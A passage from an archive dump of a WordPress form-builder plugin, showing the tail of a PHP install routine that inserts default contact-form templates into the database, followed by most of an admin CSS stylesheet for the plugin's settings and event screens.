solid"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_editor*:*type*:*custom_3*:*w_field_label*:*<h3>            How do we contact you          </h3>*:*w_editor*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class="wdform-section-break-div" style="min-width: 300px; border-top:1px solid"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_phone*:*type*:*Mobile Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_textarea*:*type*:*Message Inquiry / Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*15*:*id*:*type_submit_reset*:*type*:*type_submit_reset_15*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Simple Contact Captcha\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="3" class="wdform_row">%3 - Phone:%</div><div wdid="4" class="wdform_row">%4 - type_submit_reset_4%</div></div><div class="wdform_column"><div wdid="5" class="wdform_row">%5 - Enter the message as it&#039;s shown:%</div><div wdid="6" class="wdform_row">%6 - Message:%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'19\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'7\',\'1\',\'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#\',\'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Enter the message as it&#039;s shown:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Advanced Contact Form\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - custom_1%</div><div wdid="2" class="wdform_row">%2 - Pub/Brewery Name:%</div><div wdid="3" class="wdform_row">%3 - Full Name:%</div><div wdid="4" class="wdform_row">%4 - Address:%</div><div wdid="10" class="wdform_row">%10 - E-mail:%</div><div wdid="11" class="wdform_row">%11 - Phone Number:%</div><div wdid="12" class="wdform_row">%12 - Custom Message (If selected above):%</div><div wdid="13" class="wdform_row">%13 - type_submit_reset_13%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'24\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'14\',\'1\',\'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****##**id**##**label**##****#\',\'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h2>Featured PubQuest Listing Request</h2><br>*:*w_editor*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Pub/Brewery Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_name*:*type*:*Full Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*10*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*11*:*id*:*type_phone*:*type*:*Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*12*:*id*:*type_textarea*:*type*:*Custom Message (If selected above):*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*13*:*id*:*type_submit_reset*:*type*:*type_submit_reset_13*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Contact Form with Map\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="3" class="wdform_row">%3 - Message:%</div><div wdid="4" class="wdform_row">%4 - type_submit_reset_4%</div><div wdid="5" class="wdform_row">%5 - map_5%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'20\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'6\',\'1\',\'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****##**id**##**label**##****#\',\'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_map*:*type*:*map_5*:*w_field_label*:*2.2942540000000236*:*w_center_x*:*48.858334*:*w_center_y*:*2.294254*:*w_long*:*48.858334*:*w_lat*:*13*:*w_zoom*:*400*:*w_width*:*300*:*w_height*:**:*w_info*:*wdform_map*:*w_class*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
  }
}

?>featured/admin.css000060400000040224152434416630010153 0ustar00/**
 * Admin CSS file
 */
#fm-tabs > div{
    display:none;
}
#fm-settings{
    background: #ffffff;
    padding: 15px;
}
.fm-meta-control {
    margin-bottom: 15px;
}

.fm-meta-control label {
    display: block;
    font-weight: bold;
}

#fm-admin-promo {
    background-color: #fcf8e3;
    border: 1px solid #faebbe;
    color: #8a6d3b;
    padding: 15px;
}

#fm_event_meta .inside code {
    word-break: break-all;
}

.border{
    border: 1px solid red;
}

/*Spider events*/
.fm_repeat_type_list{
    float: left;
    width: 30%;
}
.fm_repeat_advanced{
    float: left;
    width: 68%;
}
#fm_choose_day_container div label{
    width: 120px;
    display: inline-block;
}
#fm_choose_day_container div label:after{
    clear: both;
}
#fm_choose_day_container div label input{
    float: right;
    margin: 1px;
}
.fm_icon{
    max-width: 64px;
    max-height: 64px;
}

.fm-modal .fm-calendar-event,
.fm-events .fm-calendar-event{
    width:47%;
    display: inline-block;
    margin:0 20px 10px 0;
}

.fm-events .fm-calendar-event{
    width:42%;
}
.fm-modal .fm-calendar-event span:first-child,
.fm-events .fm-calendar-event span:first-child{
    border: 1px solid #C8C8C8;
    display: inline-block;
    width: 89%;
    box-sizing: border-box;
    padding: 2px 2px 2px 7px;
    color: #7C7C7C;
    white-space: nowrap;
    text-overflow: ellipsis;
    overflow: hidden;
    float: left;
}

.fm-events .fm-calendar-event span:first-child{
    width: 81%;
}
.fm-modal .fm-calendar-event:nth-child(even){
    margin-right:0;
}

.fm-events .fm-calendar-event:after{
    clear: both;
}

.fm-modal .fm-calendar-event .fm-calendar-event-add,
.fm-events .fm-calendar-event-delete{
    display: inline-block;
    text-align: center;
    float: left;
    vertical-align: middle;
    border-radius: 2px;
    height: 24px;
    width: 24px;
    color: #FFFFff;
    background-color: #0074A2;
    cursor: pointer;
    font-size: 19px;
}


.fm-events .fm-calendar-event-edit{

}
.fm-events .fm-calendar-event-edit a{
    font-size: 0;
    display: inline-block;
    float: left;
    margin: 0 1px;
    border-radius: 2px;
    height: 24px;
    width: 24px;
    background: url("../images/edit_icon.png") no-repeat center center;
}
.fm-events .fm-calendar-event-delete{
    line-height: 20px;
}

.fm-calendar-event-add {
    cursor: pointer;
}

.fm-modal {
    position: fixed;
    font-family: Arial, Helvetica, sans-serif;
    overflow-y: scroll;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background: rgba(0, 0, 0, 0.8);
    z-index: 99999;
    opacity:0;
    -webkit-transition: opacity 400ms ease-in;
    -moz-transition: opacity 400ms ease-in;
    transition: opacity 400ms ease-in;
    pointer-events: none;
}
.fm-modal:target {
    opacity:1;
    pointer-events: auto;
}
.fm-modal > div.fm-excluded-events {
    width: 500px !important;
    position: relative;
    margin: 10% auto;
    padding: 0px 20px 16px 20px !important;
    border-radius: 1px;
    background: #fff;
}
.fm-modal > div.fm-preview {
    position: relative;
    margin: 5%;
    padding: 5px 20px 13px 20px;
    border-radius: 1px;
    background: #fff;
    min-width:600px;
}

.fm-close {
    background: url(../images/close.png);
    display: inline-block;
    position: absolute;
    right: 0px;
    height: 29px;
    top: 0px;
    width: 29px;
    text-decoration: none;
    z-index: 4;
}

.fm-excluded-events h2{
    margin: 15px 0;
    padding-bottom: 15px !important;
    border-bottom: 1px solid #B2B2B2;
}

.wd_stay_active {
    background: none repeat scroll 0% 0% green !important;
    box-shadow: 0px 1px 3px 0px #178FE5 inset !important;
    color: #FFF !important;
    font-weight: 700 !important;
}
#fm_event_pickup_date, #fm_event_pickup_time {
    height: 27px;
    border: 1px solid #A1A1A1;
    border-radius: 0;
    font-size: 13px;
    color: #444444;
    padding: 0 5px 0 27px;
    margin-top: 1px;
}

#fm_event_pickup_date {
    background:url(../images/admin_day.jpg) no-repeat left;
    margin: 1px 8px;
}
#fm_event_pickup_time {
    background:url(../images/admin_time.jpg) no-repeat left;
}

/*TABS*/
#fm-tabs, #fm-tabs div{
    background: none #ffffff;
    border: 0;
}
.fm-tabs{
    list-style-type: none;
}
.fm-tabs li,
#fm-settings-content .nav-tab-wrapper a{
    display: inline-block;
    border: 1px solid #A5A5A5;
}
.fm-tabs li a,
#fm-settings-content .nav-tab-wrapper a{
    display: table-cell;
    text-align: center;
    width: 100px;
    height: 30px;
    vertical-align: middle;
    text-decoration:none;
    color:#5E5E5E;
    font-size: 16px;
}

#fm-settings-content .nav-tab-wrapper a{
    background: #ffffff;
    height: 21px;
    margin-right: 4px;
    display: inline-block;
    font-weight: normal;
    padding-top: 2px;
}

.fm-tabs li a:focus{
    box-shadow:none;
}
.fm-tabs li:hover a,.fm-tabs li.ui-state-active a,
#fm-settings-content .nav-tab-wrapper a:hover,#fm-settings-content .nav-tab-wrapper a.nav-tab-active{
    color:#ffffff;
    background: #0074A2;
}

#fm-settings-content .nav-tab-wrapper {
    border-bottom:0;
    padding-left: 0;
}

.fm-tabs li:hover,.fm-tabs li.ui-state-active,
#fm-settings-content .nav-tab-wrapper a.nav-tab-active{
    border: 1px solid transparent;
}

.fm-tab-inner{
    padding: 15px;
}

/*Preview */
.ui-selecting { background: #FECA40 !important; }
.ui-selected { background: #F39814 !important;}

.event_cal_add {
    width: 350px;
    height: 130px;
    padding: 40px 20px 0;
    border: 1px solid #cccccc;
    position: absolute;
    z-index: 9999;
    background: #ffffff;
}
.event_cal_add .close{
    display: block;
    line-height: 18px;
    width: 20px;
    font-size: 8pt;
    margin-top: 1px;
    margin-right: 1px;
    position: absolute;
    font-family: tahoma;
    text-align: center;
    top: 0;
    right: 0;
    cursor: pointer;
    background-size: contain;
    height: 20px;
}

.event_cal_add .add_event_to_cal{
    display: block;
    cursor: pointer;
    padding-bottom: 10px;
    margin: 25px 0 0 0;
    width: 78px;
    text-align: center;
    line-height: 30px;
    height: 20px;
    background: #e3e3e3;
    border: 1px solid #eeeeee;
}
.event_cal_add .fm_notification{
    display: block;
    height: 20px;
    margin: 25px 0 0 0;
}
span.fm_error{
    color: #bc0b0b;
    display: block;
    padding-left: 36px;
    height: 20px;

}
#fm_calendar_meta h3.hndle{
    color:#0074A2;
    text-transform:uppercase;
    font-size: 17px;
}
#fm-settings a.button{
    border: 1px solid #A1A1A1;
    padding: 0px 15px;
    box-shadow: none;
    border-radius: 0;
    color: #000;
    font-weight: bold;
}
#fm-settings a.button:hover{
    border: 1px solid transparent;
    color: #fff;
    background: #0074A2;
}
#fm-settings input[type="text"],
#fm-settings select,
#fm_theme_meta input[type="text"]:not(#fm_event_location),
#fm_calendar_meta input[type="text"]:not(.fm-search),
#fm_calendar_meta select,
#fm_event_meta input[type="text"]:not(#fm_event_date_from):not(#fm_event_date_to):not(#fm_event_location),
#fm_event_meta select,
#fm_event_meta #fm_event_year_month,
#fm-settings .form-field input, #fm-settings input.regular-text{
    width:250px;
    border: 1px solid #A1A1A1;
}
#fm_event_date_from,#fm_event_date_to{
    border: 1px solid #A1A1A1;
}

#fm-settings  input[type="checkbox"],
#fm_event_meta  input[type="checkbox"],
#fm-settings  input[type="radio"]{
    position: absolute;
    z-index: -1;
    margin: 0 !important;
    width: 5px !important;
    height: 5px !important;
    min-width: 5px !important;
}


#fm-settings  .checkbox-div,
#fm_event_meta  .checkbox-div{
    width: 13px;
    height: 12px;
    background: #FDFDFD;
    border: 1px solid #CBCBCB;
    border-radius: 0px;
    position: relative;
    display: inline-block;
    top: 2px;
    margin-right: 7px;
    margin-left: 15px;
    box-sizing: content-box;
    -webkit-box-sizing: content-box;
    -moz-box-sizing: content-box;
}
#fm-settings  .checkbox-div:first-child{
    margin-left: 0px;
}

#fm-settings .checkbox-div input[type="checkbox"]:checked + label ,
#fm_event_meta .checkbox-div input[type="checkbox"]:checked + label ,
#fm-settings  .checkbox-div input[type="radio"]:checked + label {
    -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
    filter: alpha(opacity=100);
    opacity: 1;
    background: #CBCBCB;
    position: absolute;
    top: 2px;
}

#fm-settings  input[type="submit"] {
    background: #0074A2;
    color: #ffffff;
    font-weight: bold;
    font-size: 15px;
    border: 0;
    border-radius: 0;
    padding: 5px 25px;
    height: auto;
}


#fm_event_meta  .checkbox-div label,
#fm-settings  .checkbox-div label {
    cursor: pointer;
    -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
    filter: alpha(opacity=0);
    opacity: 0;
    content: "";
    position: absolute;
    width: 9px;
    height: 8px;
    background: #CBCBCB;
    border-radius: 0px;
    top: 2px;
    left: 2px;
}

#fm_calendar_meta .add_event_plus{
    display:inline-block;
    width:18px;
    height:18px;
    border-radius:100%;
    background:#0074A2;
    color:#ffffff;
    text-shadow:1px -1px 2px #005C82;
    margin-left:8px;
    text-align:center;
    font-weight: bold;
    font-size: 15px;
    line-height: 17px;
}
#fm_calendar_meta .fm-calendar-event-add a:focus{
    box-shadow:none;
}
#fm_event_meta .repeat_format{
    width: 90px;
    display: inline-block;
}
#fm_event_meta .repeat_format_monthly{
    width: 66px;
    display: inline-block;
}
#fm_event_meta #fm_event_year_month{
    margin: 10px 0 0 95px;
}
#fm_event_meta #fm_choose_day_container{
    margin-top: 10px;
}
#fm_event_meta #fm_choose_day_container .checkbox-div{
    margin-left: 0px;
}
#fm_event_meta .fm_repeat_advanced  input[type="text"],
#fm_event_meta .fm_repeat_advanced  select{
    width: auto;
}

#fm_event_meta #fm_monthly,
#fm_event_meta .fm_event_repeat_event_div{
    margin:10px 0;
}

#fm_event_meta .select_to_enable_disable{
    width:122px !important;
}

#fm_theme_meta label{
    display:inline-block;
    width:290px;
    font-weight: normal;
    font-size: 15px;
}

#fm_theme_meta .fm-tab-inner > div{
    margin:20px 0;
}
#fm_theme_meta .fm-tab-inner > div:first-child{
    margin-top:0;
}
#fm_theme_meta .with_fm_color:after,
#fm-settings-content .fm-addons_updates:after,
#fm-settings-content .main-plugin:after,
#fm-settings-content:after{
    content:'';
    display:table;
    clear:both;
}
#fm_theme_meta .with_fm_color label{
    float: left;
    margin-top: 5px;
    width: 293px;
}
#fm_theme_meta .with_fm_color > div{
    float: left;
}
.fm-import-settings form{
    float:left;
    width:45%;
}
.fm-import-settings input[type=file]{
    margin: 10px 0;
}
.fm-import-settings .fm-calendar-event-import{
    font-size: 15px;
}

#fm-settings-content #add_on_title{
    margin-bottom:20px;
}

#fm-settings-content .fm_coming_soon {
    position: absolute;
    top: 44px;
    left: 0;
}
#fm-settings-content .fm-add-on a{
    text-decoration: none;
}
#fm-settings-content .fm-add-on h2{
    color: #229DBF;
    font-size: 16px;
    margin-bottom: 9px;
    padding: 0 0 7px;
    line-height: 1.2;
}
#fm-settings-content .fm-addon-descr{
    font-size: 13px;
    line-height: 18px;
    height: 100%;
    width: 53%;
    opacity: 0;
    position: absolute;
    top: 0;
    left: 0;
    padding: 8px 10px 10px;
    background: #23282D;
    color: #D1DDE0;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-transform-origin: 0 0;
    -moz-transform-origin: 0 0;
    transform-origin: 0 0;
    -webkit-transform: rotateY(-90deg);
    -moz-transform: rotateY(-90deg);
    transform: rotateY(-90deg);
    -webkit-transition: -webkit-transform 0.4s, opacity 0.1s 0.3s;
    -moz-transition: -moz-transform 0.4s, opacity 0.1s 0.3s;
    transition: transform 0.4s, opacity 0.1s 0.3s;
    box-sizing: border-box;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
}
.grid figcaption {
    position: absolute;
    top: 0;
    left: 0;
    padding: 20px;
    background: #2c3f52;
    color: #ed4e6e;
}
#fm-settings-content .fm-addon,
#fm-settings-content .fm-addon-price{
    display: inline-block;
    margin-top: 15px;
    font-size: 15px;
    border: 1px solid #DCDCDC;
    font-weight: bold;
}
#fm-settings-content .fm-addon{
    background: #FFFFFF url(../images/Add_Ons.jpg) no-repeat 6px center;
    color: #66686B;
    padding: 9px 12px 9px 45px;
    width: 100%;
    box-sizing: border-box;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
}
#fm-settings-content .fm-addon-price{
    background: #FFFFFF;
    color: #229CBF;
    padding: 9px 12px;
}
#fm-settings-content .fm-add-on:hover .fm-addon-price,
#fm-settings-content .fm-addon-price:hover{
    background: #229CBF;
    color: #DDECF1;
}
#fm-settings-content .fm-add-on:hover .fm-addon,
#fm-settings-content .fm-addon:hover{
    background: #23282D url(../images/Add_Ons_hover.jpg) no-repeat 6px center;
    color: #DDDEDE;
}
#fm-settings-content .fm-addon span{
    border-left: 1px solid #A7A9AB;
    padding: 4px 10px 4px 10px;
}
#fm-settings-content .fm-addon-descr span{
    padding: 5px 0 5px 10px;
    border-left: 1px solid #93CEE0;
}
#fm-settings-content a:focus{
    outline:none;
    box-shadow:none;
}
#fm-settings-content .fm-add-on{
    width:310px;
    float:left;
    margin-right:40px;
    margin-bottom:57px;
    -webkit-perspective: 1700px;
    -moz-perspective: 1700px;
    perspective: 1700px;
    -webkit-perspective-origin: 0 50%;
    -moz-perspective-origin: 0 50%;
    perspective-origin: 0 50%;
    position: relative;
}
#fm-settings-content .main-plugin .fm-add-on{
    float: left;
    margin-right: 25px;
    height: auto;
}
#fm-settings-content .fm-figure{
    -webkit-transform-style: preserve-3d;
    -moz-transform-style: preserve-3d;
    transform-style: preserve-3d;
    position: relative;
    width:100%;
    height: 232px;
    margin: 0;
}
#fm-settings-content .fm-figure-img{
    overflow: hidden;
}
#fm-settings-content .fm-figure-img img{
    -webkit-transition: -webkit-transform 0.4s;
    -moz-transition: -moz-transform 0.4s;
    transition: transform 0.4s;
}
#fm-settings-content .fm-figure:hover img{
    -webkit-transform: translateX(25%);
    -moz-transform: translateX(25%);
    -ms-transform: translateX(25%);
    transform: translateX(25%);
}
#fm-settings-content .fm-figure:hover figcaption{
    opacity: 1;
    -webkit-transform: rotateY(0deg);
    -moz-transform: rotateY(0deg);
    transform: rotateY(0deg);
    -webkit-transition: -webkit-transform 0.4s, opacity 0.1s;
    -moz-transition: -moz-transform 0.4s, opacity 0.1s;
    transition: transform 0.4s, opacity 0.1s;
}
#fm-settings-content .fm-addon-subtitle {
    font-size: 25px;
    border-bottom: 1px solid #C1C4C7;
    padding-bottom: 23px;
}
#fm-settings-content .main-plugin .main-plugin-img {
    float: left;
